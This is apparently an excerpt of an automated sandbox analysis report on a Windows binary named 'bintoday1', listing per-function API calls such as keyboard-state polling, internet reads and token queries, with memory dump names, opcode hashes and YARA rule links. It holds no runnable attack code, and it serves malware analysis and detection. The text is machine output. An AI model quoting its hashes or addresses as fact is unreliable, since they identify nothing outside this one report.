GetProcAddress.KERNEL32(00000000,00000000), ref: 00C18FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00C19032
FreeLibrary.KERNEL32(00000000), ref: 00C19052

Part of subcall function 00BAF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C01043,?,7644E610), ref: 00BAF6E6
Part of subcall function 00BAF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00BEFA64,00000000,00000000,?,?,00C01043,?,7644E610,?,00BEFA64), ref: 00BAF70D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 08b787b12fdf64e3f4e6a17a1b56535de76d73a0f00976ca405f4af1dcd33958
Instruction ID: e1c79bdb085df8f88bea087fbdd10e4b5cc9f2f41515386b7f4038fd92be4e8b
Opcode Fuzzy Hash: 08b787b12fdf64e3f4e6a17a1b56535de76d73a0f00976ca405f4af1dcd33958
Instruction Fuzzy Hash: 14512935A04205DFCB15DF58C4949EDBBF1FF4A314B0580A8E81A9B762DB31EE86DB90

Function 00C26B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C26C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00C26C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C26C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C0AB79,00000000,00000000), ref: 00C26C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C26CC7

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: d878042c2efbc3167b06d949bf365392486638505bf07058d328803aaf279580
Instruction ID: ed5181d924245bf95a176ea68744f5f47f3ee6bb548bafdd2809c0bd6c82fb64
Opcode Fuzzy Hash: d878042c2efbc3167b06d949bf365392486638505bf07058d328803aaf279580
Instruction Fuzzy Hash: 51410835604124AFD724EF39DC94FA97BA5EB09360F140268FCA5A76E0C771EE41DA60

Function 00BC2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BC20C3
_free.LIBCMT ref: 00BC20E3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6c7ef695d6c2f0c3f92d4cc3c190d2c490f66b64cfeeba05fcdee68795145836
Instruction ID: 305ecf505da662c70c12c4b030fe1488e6b13dcafc5331f36f92c8f15700353d
Opcode Fuzzy Hash: 6c7ef695d6c2f0c3f92d4cc3c190d2c490f66b64cfeeba05fcdee68795145836
Instruction Fuzzy Hash: 7541AF36A002009FCB24DF78C881F6DB7E5EF89314F1545ADE615EB392DA31AD01CB90

Function 00BA912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BA9141
ScreenToClient.USER32(00000000,?), ref: 00BA915E
GetAsyncKeyState.USER32(00000001), ref: 00BA9183
GetAsyncKeyState.USER32(00000002), ref: 00BA919D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 5f090fa999bc165d1e6da114e3014522206d1480a8f466b6098e0e8120679040
Instruction ID: 292d4d1718090b2f8d32c895127610ff71f8438f03413397e02c547bdb41da2a
Opcode Fuzzy Hash: 5f090fa999bc165d1e6da114e3014522206d1480a8f466b6098e0e8120679040
Instruction Fuzzy Hash: 84414F31A0865AFBDF159F65C884BEEB7B4FF06320F208255E425B7290CB346D54EB91

Function 00C03874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00C038CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C03922
TranslateMessage.USER32(?), ref: 00C0394B
DispatchMessageW.USER32(?), ref: 00C03955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C03966

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 1c9cdba4d25ce4fa82e0359aa6dc6f89e6465b39759158238632fa18bee3cc4b
Instruction ID: 445c3ebb8a752ccf18ef92c7dfe9dd993bf782d7488b064d4dbcd05a0b282093
Opcode Fuzzy Hash: 1c9cdba4d25ce4fa82e0359aa6dc6f89e6465b39759158238632fa18bee3cc4b
Instruction Fuzzy Hash: D031C6709143C19EEB35CB369848BBA37ACAB05305F0C456AE872861E0E3F49785DB51

Function 00C0CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00C0CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 00C0CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,00C0C21E,00000000), ref: 00C0CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,00C0C21E,00000000), ref: 00C0CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,00C0C21E,00000000), ref: 00C0CFF2

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 3afbb2fd7be8bcf45a99af3f9a247b201457915132b7f6025be72c2ef7870fb2
Instruction ID: 7ce07e23b22572f24e596680a47fa2e70e6205337b6a9d1f1e0b85cf62f010b0
Opcode Fuzzy Hash: 3afbb2fd7be8bcf45a99af3f9a247b201457915132b7f6025be72c2ef7870fb2
Instruction Fuzzy Hash: F9316971604206EFDB20DFE5C8C4AAEBBF9EB14350B10456EF516D2180DB30AE41DB61

Function 00BF1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BF1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 00BF19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 00BF19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 00BF19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00BF19E2

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: bff4957344e65f9b259a29d3433b0c0e504787805583dafc7fd07f9470b40836
Instruction ID: 8eedab239234b965c825c1e2d08cbceecc2712041d3ed3b2eebf2e695d2e5c28
Opcode Fuzzy Hash: bff4957344e65f9b259a29d3433b0c0e504787805583dafc7fd07f9470b40836
Instruction Fuzzy Hash: 6231C47190021DEFCB14CFACC999BEE3BB5EB04314F008A55FA21A72D0C3B09959CB90

Function 00C25706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C25745
SendMessageW.USER32(?,00001074,?,00000001), ref: 00C2579D
_wcslen.LIBCMT ref: 00C257AF
_wcslen.LIBCMT ref: 00C257BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C25816

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 775104417ca5d9eb6bff7f94d4cdc50232ee30155ec141f6e69662023aaa9d57
Instruction ID: d70d7bfa66d3d11df0378b7b7c85056d3bee7818781aa3fe2c35cef6afb1004e
Opcode Fuzzy Hash: 775104417ca5d9eb6bff7f94d4cdc50232ee30155ec141f6e69662023aaa9d57
Instruction Fuzzy Hash: 14218F759146289ADB20DFA5EC84AEEB7B8FF04720F108256F929EA580D7708A85CF50

Function 00C10930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00C10951
GetForegroundWindow.USER32 ref: 00C10968
GetDC.USER32(00000000), ref: 00C109A4
GetPixel.GDI32(00000000,?,00000003), ref: 00C109B0
ReleaseDC.USER32(00000000,00000003), ref: 00C109E8

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 8a480b3e139533d4f76bade64c848a68017d6ff4df440460fcf8410abc93bf77
Instruction ID: d85246bdced944c1b867d0fe0204dae2cea4d035cd1abba9364df2390e69d9a0
Opcode Fuzzy Hash: 8a480b3e139533d4f76bade64c848a68017d6ff4df440460fcf8410abc93bf77
Instruction Fuzzy Hash: 5321A135600204AFD714EF65D898BAEBBF5EF44700F14806CF85A977A2CB70AD45DB90

Function 00BCCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00BCCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BCCDE9

Part of subcall function 00BC3820: RtlAllocateHeap.NTDLL(00000000,?,00C61444,?,00BAFDF5,?,?,00B9A976,00000010,00C61440,00B913FC,?,00B913C6,?,00B91129), ref: 00BC3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BCCE0F
_free.LIBCMT ref: 00BCCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BCCE31

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 22d856a97e78513139cb071791cfdb15a99b072edad31494ff2e6aecd7e6d467
Instruction ID: 57e05d201a7a20a759b70808708f24128f979b6fd6b39e5e322401080b2456bd
Opcode Fuzzy Hash: 22d856a97e78513139cb071791cfdb15a99b072edad31494ff2e6aecd7e6d467
Instruction Fuzzy Hash: 850184726016167F23215ABA6CC9F7F6DEDDED7BA231501ADF909C7201EA719D0281F0

Function 00BA9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BA9693
SelectObject.GDI32(?,00000000), ref: 00BA96A2
BeginPath.GDI32(?), ref: 00BA96B9
SelectObject.GDI32(?,00000000), ref: 00BA96E2

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: f37d2d05b9e328933c0a1c0507b6185ec3cfb3bc15f99a276deb8fc48e8b2dae
Instruction ID: 5bd40df4dd3c5ca99af92eca2f3bf0b00bd29f79775e8c3ee6429a539d49002b
Opcode Fuzzy Hash: f37d2d05b9e328933c0a1c0507b6185ec3cfb3bc15f99a276deb8fc48e8b2dae
Instruction Fuzzy Hash: A5217F30816305EBEB219F6AEC557AD3BB8FF02316F1C0256F810A61A0D3B05892EF94

Function 00BF5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00BF5726
_memcmp.LIBVCRUNTIME ref: 00BF5744
_memcmp.LIBVCRUNTIME ref: 00BF5757
_memcmp.LIBVCRUNTIME ref: 00BF576F
_memcmp.LIBVCRUNTIME ref: 00BF5787

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fc710c9fec89dddff4653329837e00fba7e6f69a896f13774b47b95a370ac459
Instruction ID: c7aecf678146f9f13690074a919f86924df942864df6592813ff37f02daf4355
Opcode Fuzzy Hash: fc710c9fec89dddff4653329837e00fba7e6f69a896f13774b47b95a370ac459
Instruction Fuzzy Hash: 3E01D272345A1DBB9228A515AD82EFB63DCDB20394B4000B4FF059B641F6A0ED2583A4

Function 00BC2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00BBF2DE,00BC3863,00C61444,?,00BAFDF5,?,?,00B9A976,00000010,00C61440,00B913FC,?,00B913C6), ref: 00BC2DFD
_free.LIBCMT ref: 00BC2E32
_free.LIBCMT ref: 00BC2E59
SetLastError.KERNEL32(00000000,00B91129), ref: 00BC2E66
SetLastError.KERNEL32(00000000,00B91129), ref: 00BC2E6F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: d517065c08d6b451173d715d962d361cb8463852225404e5eb2d804ca9193c29
Instruction ID: 9edf89e6ce8e8a44fe9b8328c675a9b0c292f93df2df7827d06a1b17e9e05109
Opcode Fuzzy Hash: d517065c08d6b451173d715d962d361cb8463852225404e5eb2d804ca9193c29
Instruction Fuzzy Hash: 3A012836205B026BCA2267746CC5F6F26EDEBC17B1B2044ACF421B22E2EF708C014020

Function 00BF000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?,?,?,00BF035E), ref: 00BF002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?,?), ref: 00BF0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?,?), ref: 00BF0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?), ref: 00BF0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00BEFF41,80070057,?,?), ref: 00BF0070

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 84be21546bc35d724039c0642c164b734688b29a7cbd9f4b814b9d76f8bff2d7
Instruction ID: 4eb274e774b612163fa21fad3dd18170ca208d8b2b46855da6b3000b42c57369
Opcode Fuzzy Hash: 84be21546bc35d724039c0642c164b734688b29a7cbd9f4b814b9d76f8bff2d7
Instruction Fuzzy Hash: 98017C7262020CBBDB215F68DC84BAE7BEDEB44751F148164FA05D3221DB75DD458BA0

Function 00BFE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00BFE997
QueryPerformanceFrequency.KERNEL32(?), ref: 00BFE9A5
Sleep.KERNEL32(00000000), ref: 00BFE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 00BFE9B7
Sleep.KERNEL32 ref: 00BFE9F3

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 9bdd116d82a186e0a7a5383c3e9a4d5e7ccb85cb1e11373900fcd6a6623857cf
Instruction ID: 404019d80a8be619a9ceb19a19622084edb42fe823e5761130532f798acbc4b3
Opcode Fuzzy Hash: 9bdd116d82a186e0a7a5383c3e9a4d5e7ccb85cb1e11373900fcd6a6623857cf
Instruction Fuzzy Hash: C5013931C0162DDBCF109BE4D8897FDBBB8FB09700F008586E612B3260CB709569C7A1

Function 00BF10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BF1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00BF0B9B,?,?,?), ref: 00BF1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BF114D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 301f915c88f5622e229fcb6f772c6586357b92c3ec73f0a2693425db881631b9
Instruction ID: 580d7c0a0d2ca2a1b8f24c41d9a616e07d61bea266fdc7a792c3694e8ed38ecc
Opcode Fuzzy Hash: 301f915c88f5622e229fcb6f772c6586357b92c3ec73f0a2693425db881631b9
Instruction Fuzzy Hash: 7A016D79100205BFDB214F68DC89B6E3BAEEF85360B100854FA41D3360DB31DD158A60

Function 00BF0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BF0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BF0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BF0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BF0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BF1002

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: b2a467cd9cd6afa23e32a09241d02efd44df86b5043250bf1d024b7606807c80
Instruction ID: 216fbfe8b3ac0df25bdb8b8b47a7f4a98795a1f1c6b6eb2db871a1e19da00457
Opcode Fuzzy Hash: b2a467cd9cd6afa23e32a09241d02efd44df86b5043250bf1d024b7606807c80
